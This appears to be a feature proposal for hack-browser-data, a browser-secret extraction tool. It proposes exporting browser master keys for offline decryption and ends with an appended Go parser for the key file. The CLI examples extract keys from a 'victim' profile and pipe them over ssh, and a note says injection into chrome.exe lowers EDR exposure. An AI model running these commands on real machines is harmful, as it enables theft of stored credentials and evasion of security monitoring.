Summary
Add a dump-keys subcommand that exports browser master keys (JSON) without decrypting any profile data, plus a --keys flag on dump that consumes those keys in place of deriving them locally.
This decouples master key extraction (must run on the origin host / live session) from data decryption (can run anywhere), enabling offline and cross-host workflows that are currently impossible — see #481, #485.
Proposed CLI
# Extract keys on the origin host, print to stdout (default, no disk artifact)
hack-browser-data dump-keys -b all
# Or write to a file (0600, user-confirmed path)
hack-browser-data dump-keys -b all -o keys.json
# Decrypt on an analysis host, consume keys from stdin or file, pair with -p
hack-browser-data dump --keys - -p /mnt/image/Users/victim -b chrome
hack-browser-data dump --keys keys.json -p /path/to/copied/profile
# End-to-end pipe — nothing touches disk
ssh origin-host hack-browser-data dump-keys -b chrome | \
hack-browser-data dump --keys - -p /mnt/image/...
Output format (draft)
{
  "version": 1,
  "entries": [
    { "browser": "chrome", "profile": "Default", "scheme": "v10", "key_b64": "..." },
    { "browser": "chrome", "profile": "Default", "scheme": "v20", "key_b64": "..." }
  ]
}
scheme covers: v10 / v11 / v20 (Chromium Windows), chromium-darwin, chromium-linux, firefox, etc.
Notes
- Default output is stdout; file output is opt-in via -o.
- All logs must go to stderr so stdout stays a clean data channel.
- Warn on stderr when stdout is a TTY (avoid leaving keys in terminal scrollback).
- Chrome v20 bonus: reflective injection into chrome.exe runs once on the origin host; offline decrypts no longer re-trigger ABE (lower EDR surface).
Related
--profile-dir-path options
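A strict reader for the draft key file under "Output format (draft)", as an added example that is not code from this issue or from the project. The names KeyFile, ParseKeyFile and knownSchemes are hypothetical, and it assumes key_b64 uses standard padded base64 and that schemes outside the ones listed in the draft are rejected.

```go
package main

import (
	"encoding/base64"
	"encoding/json"
	"fmt"
	"io"
	"strings"
)

// KeyFile mirrors the draft JSON on this page; the Go names are hypothetical.
type KeyFile struct {
	Version int `json:"version"`
	Entries []struct {
		Browser, Profile, Scheme string // encoding/json matches these case-insensitively
		KeyB64                   string `json:"key_b64"`
	} `json:"entries"`
}

// Schemes the draft names; it ends in "etc.", so rejecting others is an assumption.
var knownSchemes = map[string]bool{"v10": true, "v11": true, "v20": true, "chromium-darwin": true, "chromium-linux": true, "firefox": true}

// ParseKeyFile reads at most 1 MiB, rejects unknown fields and validates each entry.
func ParseKeyFile(r io.Reader) (*KeyFile, error) {
	dec := json.NewDecoder(io.LimitReader(r, 1<<20))
	dec.DisallowUnknownFields()
	var kf KeyFile
	if err := dec.Decode(&kf); err != nil {
		return nil, fmt.Errorf("decode: %w", err)
	}
	if kf.Version != 1 {
		return nil, fmt.Errorf("unsupported version %d", kf.Version)
	}
	for i, e := range kf.Entries {
		k, err := base64.StdEncoding.DecodeString(e.KeyB64)
		if e.Browser == "" || e.Profile == "" || !knownSchemes[e.Scheme] {
			return nil, fmt.Errorf("entry %d: empty browser/profile or unknown scheme %q", i, e.Scheme)
		}
		if err != nil || len(k) == 0 { // error text never echoes key material
			return nil, fmt.Errorf("entry %d: key_b64 is not non-empty standard base64", i)
		}
	}
	return &kf, nil
}

func main() {
	// Constructed sample: "AAAA" is placeholder bytes, not a real key.
	_, err := ParseKeyFile(strings.NewReader(`{"version":1,"entries":[{"browser":"chrome","profile":"Default","scheme":"v10","key_b64":"AAAA"}]}`))
	fmt.Println("sample valid:", err == nil)
}
```

The literal "..." placeholder from the draft fails this check, since "." is outside the base64 alphabet.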